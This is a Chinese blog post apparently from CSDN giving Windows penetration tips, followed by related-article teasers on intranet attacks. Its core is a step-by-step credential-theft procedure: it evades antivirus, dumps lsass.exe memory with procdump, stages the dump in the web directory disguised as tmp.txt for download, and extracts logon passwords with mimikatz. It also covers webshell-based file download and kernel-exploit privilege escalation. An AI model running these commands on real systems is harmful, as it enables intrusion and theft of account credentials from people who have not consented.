windows渗透技巧

最新推荐文章于 2024-05-22 19:32:47 发布
最新推荐文章于 2024-05-22 19:32:47 发布
阅读量1k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: windows渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Grant/article/details/102669711
版权

文章目录

一,命令行下载方法

	1. powershell下
	 		Invoke-WebRequest

	3. ftp
	4. 写脚本(马),菜刀连接
	5. bitsadmin
	6. certutil

二,搜索指定文件路径和 ☞dir

dir /b /s XXXX

cd /d E: && dir /b /s XXXXX 指定在E盘搜索

/b    使用空格式(没有标题信息或摘要)

/s    显示指定目录和所有子目录中的文件

在这里插入图片描述

三,查看进程的方法 ☞tasklist

tasklist

/svc :无间断地列出每个过程的所有服务信息

在这里插入图片描述

  • 寻找杀软
  • 寻找可利用的第三方

四,绕过杀软,离线读密码

由于杀软的存在,使得一些类似激活guest,添加用户的命令和mimikatz上传不能正常执行。

【解决】

采用procdump导出lsass.dmp,然后从web下载到本地,再使用mimikatz离线读密码绕过

  • procdump是微软官方抓取信息工具
  • lsass.exe 是内存文进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到

【将lsass.dmp导出到哪】

目的是离线读,自然是导出到web目录下, 才能下载到本地喽
		①用dir找到网站目录
					cd /d E: && dir /b /s Logon.aspx|php’
		②copy到该目录
					copy lsass.dmp “E:\Program Files\Web\tmp.txt”

【步骤】

	1. 下载procdump工具
	2. 导出lsass.dmp
			procdump64.exe -accepteula -ma lsass.exe lsass.dmp	
	
	3. 找到web目录,将lsass.dmp 移动到该目录。并下载到本地
	4. 使用mimikatz读取密码
		      mimikatz.exe "sekurlsa::minidump lsass.txt" "sekurlsa::logonPasswords full" exit

相关网站

五,使用windows-kernel-exploits脚本提权

提权枚举脚本使用说明

由SecWiki 大神搞的项目

    1. getshell后 systeminfo查看补丁信息
    2. 本地使用windows-kernel-exploits,进行匹配
	3. 根据匹配的信息在secwiki的项目中找到如何利用的方式。
冗长
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【内网安全】——Windows提权姿势
qq_53058639的博客
01-27 902
令牌(Token):令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。令牌分类访问令牌(Access Token): 表示访问控制操作主体的系统对象会话令牌(Session Token): 交互会话中唯一的身份标识符。
内网渗透windows 基础
qq_49433473的博客
10-16 4331
windows用户、组、SID以及基本命令,了解windows 认证及密码、windows UAC机制、认识 windows ASR以及Windows Applocker,Token的组成,Windows PowerShell的使用与绕过方式、最后认识域
Kali渗透Windows服务器
最新发布
wholeliubei的博客
05-22 757
如果你也想学习:黑客&网络安全的零基础攻防教程本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。
内网渗透-DC域控Windows2012环境搭建
qq_46898005的博客
08-04 1133
Windows2012内网环境安装与配置,Windows2008加入域
漏洞利用EXP windows-kernel-exploits-master.zip
03-10
本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。
渗透之——win2012R2打Windows8.1-KB2919355
冰河的专栏
01-22 2012
安装有先后顺序 第一步: Windows8.1-KB2919442-x64.msu     下载链接:https://www.microsoft.com/zh-cn/download/details.aspx?id=42153 第二步: clearcompressionflag.exe     下载链接:https://www.microsoft.com/zh-CN/download/de...
Windows渗透与提权技巧
05-05
在网络安全领域,Windows渗透与提权技巧是至关重要的部分,主要涉及如何在未经授权的情况下发现并利用系统的漏洞,以及如何从低权限用户身份提升到管理员权限。以下是对这一主题的详细阐述: 1. **Windows渗透技术*...
Windows 企业网络渗透测试.pdf
10-06
针对Windows企业网络的渗透测试尤其重要,因为Windows操作系统在企业环境中广泛使用,且往往承载着关键业务和敏感数据。本文件可能详细介绍了在Windows环境下进行渗透测试时可能会遇到的特定技术和策略。 首先,...
渗透完全技巧.pdf
10-03
【域渗透】是针对Windows域环境进行的一种高级攻击技术,目的是控制域控制器,从而获取整个网络的控制权。【内网横向】是指在获得初步权限后,在内网中进一步扩散影响力,【权限维持】则是指在成功入侵后保持长期的...
红队技巧:隐藏windows服务1
08-03
本文将探讨一种红队技巧,即如何使用PowerShell隐藏Windows服务,以提高在后渗透测试阶段的持久性和隐蔽性。 首先,创建一个Windows服务是维持权限的关键步骤。使用命令行工具`sc`,我们可以创建一个名为`mrxn`的...
Windows 服务器和活动目录 - 渗透测试.pdf
10-06
这些资源涵盖了从基本的网络扫描到复杂的权限提升和身份验证绕过技巧,对于想要深入理解Windows服务器和活动目录安全性的专业人士来说,是宝贵的参考资料。在进行渗透测试时,了解和熟练掌握这些技术和工具,不仅...
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2241
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
任务4. Windows操作系统渗透测试解题思路
shatianyzg的博客
06-05 636
任务环境说明: 服务器场景:PYsystem4 服务器场景操作系统:Windows(版本不详)1.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;(6分) 提示利用ms08_067漏洞进行msf渗透 发现存在445漏洞 Flag:Microsoft Windows XP|20032.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行系统服务及版本扫描渗透测试,并将该操作显示结果
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
渗透心得及思路
十五年游戏主程转渗透之路
03-27 372
思路
渗透测试思路总结
weixin_33881050的博客
09-15 2070
一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。 第一个是在渗透操作系统时,最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit...
windows渗透测试
Aluxian_的博客
05-25 9122
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
L_lemo004的博客
10-20 666
渗透提权常用漏洞 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [An elevation of privilege vulnerability exists in
Windows渗透基础大全
谢公子的博客
10-16 7315
目录 Windows发展历史 Windows中常见的目录 Windows常见的cmd命令 Windows中cmd窗口的文件下载(bitsadmin、certutil、iwr) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Window...
腾讯SRC深度解析:Windows内网渗透策略与技巧
在"红蓝对抗之Windows内网渗透-腾讯SRC出品1"中,作者深入探讨了Windows内网渗透的各种技巧和方法,主要针对的是企业内部的安全挑战。文章从以下几个关键点展开: 1. **端口连接**:利用netstat-ano命令分析机器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值